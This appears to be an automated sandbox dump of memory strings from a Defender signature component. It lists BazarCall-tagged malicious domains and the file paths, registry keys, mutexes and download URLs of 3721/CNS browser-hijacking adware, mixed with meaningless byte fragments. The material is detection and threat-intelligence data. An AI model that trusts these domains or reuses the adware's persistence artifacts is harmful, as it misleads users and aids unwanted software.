Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p2simple-backupbooster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$top3-services.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(backup1services.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p2backupmaster-service.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p0backupmasterservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(service1updater.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: driverdwl.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$backup1master.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p,boost-yourservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&checktodrivers.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$backup1helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&driver1updater.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$driver1master.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p view-backup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p.top3servicebooster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$servicereader.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: servicehel.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(driver-boosters.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&service1update.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p service-hel.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*driver1downloads.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"service1view.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&backups1helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: idriveview.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$debug-service.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: idrivedwn.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"driverjumper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$service1boost.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"idriveupdate.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"idrivehepler.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"idrivefinder.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p idrivecheck.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&idrivedownload.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p filmverbine.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: !#nri:ti:domains:bazarcall.a
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: {nxl89
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: (a-3aphx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: )k7q$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 0nvsy
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: $8rfq
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: h22da*
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: gcea{
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: ^et?5
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: ifsls
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 0uh/8w
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &r6x#i
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: e_=i7a%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: _$qj5
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: qy['{
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: ixq;d
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: @'f|j
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: >lgxq
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: g?asr
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: vng!h
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: v},zl
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: d=7ya
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: `;91m
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: byg)kf|{
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: g4\g?s0z
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: ~v7r;
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: j,dv0
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: lw:>$a
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: i$/gn=
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 7%p3"
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: "u2bu
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: #ek#r
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: e!y6~
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: -t`se
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: nq%fq
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 0p/c7!
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: )lm4?jya
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: gw"x_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: #p:''
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .ivtc)u
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p{g$a
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cem"~
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: ?!(ia
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: xs@|*25
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: hjxwh
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: `~lu">
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: ez`+&=j
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: a}k"!z
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: x@[;c
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: '`q'oe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: c3h3l
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: :vfbd
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: nolm&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: k*(g*
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: taca)m!v
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 0%r`z
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .bd~
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: e&6!@]
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: `h*l:
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: )epz8q
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: i3cyc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: $2la!
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: %hrk9
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: swmqw
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: `wd<*
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: pmg[8
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: qa{u.
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: j'~yy
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: :e& x
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: :3a39
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: ttyb$de
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: a|f2~
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: vices\cnsminkp
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: {c22d6d40-47d8-40fe-825a-cc7f4d88b3b8}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\cnsmin\variant
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnscfgf.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsmin.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsmin.datx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnshint.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \cnsminio.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: clsid\{b83fc273-3522-4cc6-92ec-75cc86678da4}\inprocserver32
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 3721cnsbarprop
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnstips
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnscollect
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsplus.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\microsoft\internet explorer\advancedoptions\!cns
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: http://cns.3721.com/cns.dll?
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: http://cns.3721.com/cns.dll?xc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsminex.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: http://seek.3721.com/srchasst.htm
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \cns.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \cns.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsminhk.cnshook.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: clsid\{a5adeae7-a8b4-4f94-9128-bf8d8db5e927}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnshook.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: http://download.3721.com/download/cnsminexm.ini
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: %scnsminse.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsminup.cab
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsminup.cabxx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnssearch
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsmincg.ini
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: http://assistant.3721.com/help/uninstcns.htm
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: download.3721.com/download/cns
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\cnsmin\cnsminex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\microsoft\windows\currentversion\explorer\browser helper objects\{d157330a-9ef3-49f8-9a67-4141ac41add4}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsmin.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsmin.datxu
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnshint.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\assist\plugins
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: %s,runsettings -repairie
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsenable
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: assisantshare
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: uninstall\{1b0e7716-898e-48cc-9690-4e338e8de1d3}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: assistantregisterusermutex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 3721helper_cnsx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsmin.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\interchina\chin@ddress
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: chinaddrmainmutexstr
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: http://assistant.3721.com/instok
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\cnsmin
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: assistcns
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: http://download.3721.com/download/cnsminup
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: clsid\{7ca83cf1-3aea-42d0-a4e3-1594fc6e48b2}\inprocserver32
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsautoupdatemutex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsminbypassnamemutex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\cnsmin\variantx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cns.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .\systemroot\cnsinfo.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: j\registry\machine\software\cnredirect
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 8\systemroot\system32\cns.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 8\systemroot\system32\cns.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \device\cnsminkp
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: (\dosdevices\cnsminkp
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cnsminkp
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: l{d157330a-9ef3-49f8-9a67-4141ac41add4}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: >\basenamedobjects\cnsminkpevent
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \cnsmin.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\cnsmin.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \cnshook.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: %\cnshook.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \cnscfgf.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\cnscfgf.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \cnscfgr.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\cnscfgr.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \bdhelper.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: %\bdhelper.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \3721\helper.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\3721\helper.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \3721\ces\ces.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\3721\ces\ces.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \3721\ces\cessw.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\3721\ces\cessw.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \3721\assist\asbar.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\3721\assist\asbar.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \3721\assist\assist.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\3721\assist\assist.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \3721\assist\cnsminkp.sys_%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\cnsup.ini_&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\cnsmin.ini_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\cnsminaf.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\cnsmincg.ini_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\cnsminck.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\cnsmindt.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\cnsminex.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\cnsminio.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\cnsminsv.cab_)
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\keepmainm.cab_-
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\3721\cnsminkp.vxd_/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\3721\cnsminkp2k.sys_/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\3721\cnsminkpxp.sys`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\3721\assist\cnsminkp.sys_%$\downloaded program files\cnsup.ini_&$\downloaded program files\cnsmin.ini_($\downloaded program files\cnsminaf.cab_($\downloaded program files\cnsmincg.ini_($\downloaded program files\cnsminck.cab_($\downloaded program files\cnsmindt.cab_($\downloaded program files\cnsminex.cab_($\downloaded program files\cnsminio.cab_($\downloaded program files\cnsminsv.cab_)$\downloaded program files\keepmainm.cab_-$\downloaded program files\3721\cnsminkp.vxd_/$\downloaded program files\3721\cnsminkp2k.sys_/$\downloaded program files\3721\cnsminkpxp.sys`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \3721`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\3721`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \yisou`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\yisou`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \3721\assist`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: &\3721\assist`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \programs\chinese keywor`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \downloaded program files\3721c
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: \programs\chinese keywor` $\downloaded program files\3721c
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721c
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\yisou
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\yisouc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\interchina
